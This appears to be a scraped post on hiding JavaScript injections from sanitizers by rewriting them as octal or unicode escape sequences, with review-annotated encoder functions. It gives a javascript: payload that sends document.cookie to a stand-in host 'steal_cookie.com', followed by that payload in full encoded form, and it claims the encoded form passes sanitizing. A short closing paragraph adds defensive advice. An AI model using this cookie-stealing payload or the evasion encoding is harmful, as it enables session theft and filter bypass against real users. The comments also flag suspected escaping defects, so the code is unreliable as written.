But Totally Unreadable



/**
 * Rewrite a string as backslash-octal escape text, "preferring octal over unicode".
 *
 * Every UTF-16 unit matched by `.` whose code is below 256 becomes two
 * backslash characters followed by its octal code; anything at 256 or above
 * is handed to unicode_to_string().
 *
 * Review notes:
 * - `.` does not match line terminators, so those are left in the output as-is.
 * - The pad is a single '0', so codes below 8 come out as two octal digits, not three.
 * - NOTE(review): two backslashes are emitted per escape; this looks like an
 *   escaping artifact of how the page was stored - confirm against the original post.
 * - Defensive relevance: a JavaScript parser resolves such escapes back to the
 *   original characters, so a filter that matches keywords in raw text has to
 *   normalise escape sequences first.
 *
 * @param {string} string - text to encode
 * @returns {string} the escape-encoded text
 */
function string_to_octal(string){
  return string.replace(/./g, function(unit){
    var code = unit.charCodeAt(0);
    if (code >= 256) {
      // No octal form is produced from 256 up; delegate to the helper.
      return unicode_to_string(unit);
    }
    var padded = '0' + code.toString(8);
    return "\\\\" + padded.slice(-3);
  });
}
/**
 * Rewrite a string as four-hex-digit unicode escape text.
 *
 * Every UTF-16 unit matched by `.` becomes two backslash characters, a `u`,
 * and its char code as lower-case hex, left-padded with zeros to four digits.
 *
 * Review notes:
 * - `.` does not match line terminators, so those are left in the output as-is.
 * - NOTE(review): two backslashes are emitted per escape; this looks like an
 *   escaping artifact of how the page was stored - confirm against the original post.
 * - Defensive relevance: text in this form evaluates to the same string as the
 *   plain original, so keyword filters need to decode escapes before matching.
 *
 * @param {string} string - text to encode
 * @returns {string} the escape-encoded text
 */
function string_to_unicode(string){
  return string.replace(/./g, function(unit){
    var hex = unit.charCodeAt(0).toString(16);
    var padded = ('0000' + hex).slice(-4);
    return "\\\\u" + padded;
  });
}
/**
 * Replace each character matched by the pattern with the character rebuilt
 * from its own char code.
 *
 * Because every match is replaced by the same character it came from, the
 * returned string equals the input.
 *
 * Review notes:
 * - NOTE(review): the name suggests turning escape text back into characters,
 *   which this body does not do - confirm the intent.
 * - NOTE(review): with the doubled backslashes, the character class is not the
 *   range U+0000 to U+FFFF; this looks like an escaping artifact of how the
 *   page was stored - confirm against the original post.
 *
 * @param {string} string - input text
 * @returns {string} text equal to the input
 */
function unicode_to_string(string){
  var pattern = /[\\u0000-\\uffff]/g;
  return string.replace(pattern, function(unit){
    // The decimal string is coerced back to a number by fromCharCode.
    var decimalCode = unit.charCodeAt(0).toString(10);
    return String.fromCharCode(decimalCode);
  });
}


test it..
for javascript:(function(){var img = new Image(); img.src="https://steal_cookie.com?cookie=" + encodeURIComponent(document.cookie); return true;}());

either the "prefer octal over unicode": "\\152\\141\\166\\141\\163\\143\\162\\151\\160\\164\\072\\050\\146\\165\\156\\143\\164\\151\\157\\156\\050\\051\\173\\166\\141\\162\\040\\151\\155\\147\\040\\075\\040\\156\\145\\167\\040\\111\\155\\141\\147\\145\\050\\051\\073\\040\\151\\155\\147\\056\\163\\162\\143\\075\\042\\150\\164\\164\\160\\163\\072\\057\\057\\163\\164\\145\\141\\154\\137\\143\\157\\157\\153\\151\\145\\056\\143\\157\\155\\077\\143\\157\\157\\153\\151\\145\\075\\042\\040\\053\\040\\145\\156\\143\\157\\144\\145\\125\\122\\111\\103\\157\\155\\160\\157\\156\\145\\156\\164\\050\\144\\157\\143\\165\\155\\145\\156\\164\\056\\143\\157\\157\\153\\151\\145\\051\\073\\040\\162\\145\\164\\165\\162\\156\\040\\164\\162\\165\\145\\073\\175\\050\\051\\051\\073" (which most of ASCII based code will work quite unify with..)
or just "100% unicode encoding": "\\u006a\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003a\\u0028\\u0066\\u0075\\u006e\\u0063\\u0074\\u0069\\u006f\\u006e\\u0028\\u0029\\u007b\\u0076\\u0061\\u0072\\u0020\\u0069\\u006d\\u0067\\u0020\\u003d\\u0020\\u006e\\u0065\\u0077\\u0020\\u0049\\u006d\\u0061\\u0067\\u0065\\u0028\\u0029\\u003b\\u0020\\u0069\\u006d\\u0067\\u002e\\u0073\\u0072\\u0063\\u003d\\u0022\\u0068\\u0074\\u0074\\u0070\\u0073\\u003a\\u002f\\u002f\\u0073\\u0074\\u0065\\u0061\\u006c\\u005f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u0063\\u006f\\u006d\\u003f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u003d\\u0022\\u0020\\u002b\\u0020\\u0065\\u006e\\u0063\\u006f\\u0064\\u0065\\u0055\\u0052\\u0049\\u0043\\u006f\\u006d\\u0070\\u006f\\u006e\\u0065\\u006e\\u0074\\u0028\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\\u002e\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u0029\\u003b\\u0020\\u0072\\u0065\\u0074\\u0075\\u0072\\u006e\\u0020\\u0074\\u0072\\u0075\\u0065\\u003b\\u007d\\u0028\\u0029\\u0029\\u003b"

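Evaluating either encoded string has the same meaning as the original. It never actually needs to be translated back, because the escapes are resolved when the string is evaluated; it is 100% executable code, just (naturally) a bit harder to read.
It DOES pass sanitizing successfully, since the character encoding does not change the meaning of any character (it is only string escaping, i.e. string manipulation). For a defender this means a filter has to decode escape sequences before it matches anything, and is better backed by controls that do not rely on pattern matching: a Content-Security-Policy that disallows inline script and javascript: URLs, and the HttpOnly flag so that session cookies cannot be read through document.cookie.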


The idea is that you do not need any conversion-matrix tables or encrypt/decrypt methods (or any intermediate step beyond just evaluating the string).

', 'JavaScript Character Encoding As Spoofing, Or Malicious Injections That Are 100% executable